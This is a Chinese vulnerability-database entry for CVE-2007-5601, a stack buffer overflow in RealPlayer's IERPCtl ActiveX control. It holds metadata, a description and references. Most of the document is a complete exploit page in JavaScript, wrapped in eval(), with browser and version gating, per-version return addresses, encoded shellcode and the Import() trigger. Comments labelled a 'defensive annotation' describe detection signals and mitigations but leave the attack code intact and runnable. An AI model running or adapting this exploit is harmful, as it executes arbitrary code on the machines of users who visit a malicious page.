RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞

漏洞ID 1113811 漏洞类型 缓冲区溢出
发布时间 2007-10-18 更新时间 2008-11-07
CVE编号 CVE-2007-5601 CNNVD-ID CNNVD-200710-414
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/30692
https://www.securityfocus.com/bid/26130
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-414
|漏洞详情
RealPlayer是一款流行的媒体播放器,支持多种媒体格式。RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表,因此如果用户受骗访问了恶意网页并通过IERPCtl ActiveX控件的Import()方法导入了恶意文件的话,就可以触发这个溢出,导致拒绝服务或执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/26130/info

RealPlayer is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks of user-supplied input before copying it to an insufficiently sized memory buffer.

Attackers can exploit this issue to execute arbitrary code in the context of the application using the affected control (typically Internet Explorer). Successful attacks can compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. 

<script language="javascript">
// Defensive annotation of the published proof-of-concept for CVE-2007-5601
// (BID 26130); the code below is left byte-for-byte as printed. The whole
// function is handed to eval() as one string literal — dynamic evaluation of
// a string containing ActiveXObject() is itself a useful detection signal.
// Use this listing to build detections and to validate the vendor fix / kill
// bit, not as something to run.

eval("function RealExploit()

{

// Fingerprint gate: proceeds only for MSIE 6 or 7 on Windows NT 5.x, otherwise
// returns silently. UA/OS gating immediately followed by an ActiveXObject()
// instantiation is a common exploit-page pattern worth alerting on.
var user = navigator.userAgent.toLowerCase();

if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)

  return;

if(user.indexOf("nt 5.")==-1)

  return;

// The ProgID of the vulnerable IERPCtl control is assembled from fragments so a
// naive literal signature for the joined ProgID does not match the page source.
// Detections should match the concatenated value at runtime (or rely on the
// CLSID kill bit referenced by the US-CERT advisories listed on this page).
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";

try

{

  Real = new ActiveXObject(VulObject);

}catch(error)

{

  return;

}

// Reads the installed RealPlayer build so the payload can be tailored per
// version. A page that calls PlayerProperty("PRODUCTVERSION") and then Import()
// with an abnormally long playlist-name argument is suspect.
RealVersion = Real.PlayerProperty("PRODUCTVERSION");

Padding = "";

JmpOver = unescape("%75%06%74%04");

// Builds the oversized string (32*148 = 4736 characters) that will be passed
// as the playlist name — the argument the control fails to bounds-check.
for(i=0;i<32*148;i++)

  Padding += "S";

 

 

// Version- and UI-language-specific constants. Note the PoC returns (does
// nothing) for any build or locale it has no values for; on such systems the
// vulnerable control is still present — no crash does not mean not vulnerable.
if(RealVersion.indexOf("6.0.14.") == -1)

{

  if(navigator.userLanguage.toLowerCase() == "zh-cn")

   ret = unescape("%7f%a5%60");

  else if(navigator.userLanguage.toLowerCase() == "en-us")

   ret = unescape("%4f%71%a4%60");

  else

   return;

}

else if(RealVersion == "6.0.14.544")

  ret = unescape("%63%11%08%60");

else if(RealVersion == "6.0.14.550")

  ret = unescape("%63%11%04%60");

else if(RealVersion == "6.0.14.552")

  ret = unescape("%79%31%01%60");

else if(RealVersion == "6.0.14.543")

  ret = unescape("%79%31%09%60");

else if(RealVersion == "6.0.14.536")

  ret = unescape("%51%11%70%63");

else

  return;

 

 

 

// Per-version extension of the overflow string (6.0.10 through 6.0.14 builds
// are covered). The layout is deliberately not documented further here.
if(RealVersion.indexOf("6.0.10.") != -1)

{

  for(i=0;i<4;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.11.") != -1)

{

  for(i=0;i<6;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.12.") != -1)

{

  for(i=0;i<9;i++)

   Padding = Padding + JmpOver;

  Padding = Padding + ret;

}

else if(RealVersion.indexOf("6.0.14.") != -1)

{

  for(i=0;i<10;i++)

   Padding = Padding + JmpOver;

   Padding = Padding + ret;

}

 

AdjESP = "LLLL\\XXXXXLD";

// The payload blob consists only of letters and digits, i.e. it appears to be
// alphanumerically encoded (a typical evasion against filters that reject
// non-printable bytes). Not decoded here; treat long all-alphanumeric string
// literals next to ActiveX calls as a detection feature.
Shell = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp";

PayLoad = Padding + AdjESP + Shell;

// Pads the final string to at least 0x8000 (32768) characters.
while(PayLoad.length < 0x8000)

  PayLoad += "YuanGe"; // ?~??~-.=!

// The trigger: the second argument (playlist name) to IERPCtl.Import() carries
// the overflow; the first argument is presumably just a file that exists on a
// default Windows install so the import proceeds. Mitigation: apply the vendor
// update (service.real.com advisory in the references) or set the kill bit for
// the IERPCtl control in Internet Explorer; content inspection can key on
// Import() being called with a playlist-name argument of several KB.
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);

}

RealExploit();")

</script>
|受影响的产品
RealNetworks RealPlayer 10.5 RealNetworks RealPlayer 10.0 + S.u.S.E. cvsup-16.1h-43.i586.rpm + S.u.S.E. Linux Personal 9.3
|参考资料

来源:US-CERT
名称:TA07-297A
链接:http://www.us-cert.gov/cas/techalerts/TA07-297A.html
来源:US-CERT
名称:VU#871673
链接:http://www.kb.cert.org/vuls/id/871673
来源:XF
名称:realplayer-activex-bo(37280)
链接:http://xforce.iss.net/xforce/xfdb/37280
来源:MISC
链接:http://www.symantec.com/enterprise/security_response/weblog/2007/10/realplayer_exploit_on_the_loos.html
来源:SECTRACK
名称:1018843
链接:http://www.securitytracker.com/id?1018843
来源:BID
名称:26130
链接:http://www.securityfocus.com/bid/26130
来源:MISC
链接:http://www.infosecblog.org/2007/10/nasa-bans-ie.html
来源:VUPEN
名称:ADV-2007-3548
链接:http://www.frsirt.com/english/advisories/2007/3548
来源:service.real.com
链接:http://service.real.com/realplayer/security/191007_player/en/
来源:SECUNIA
名称:27248
链接:http://secunia.com/advisories/27248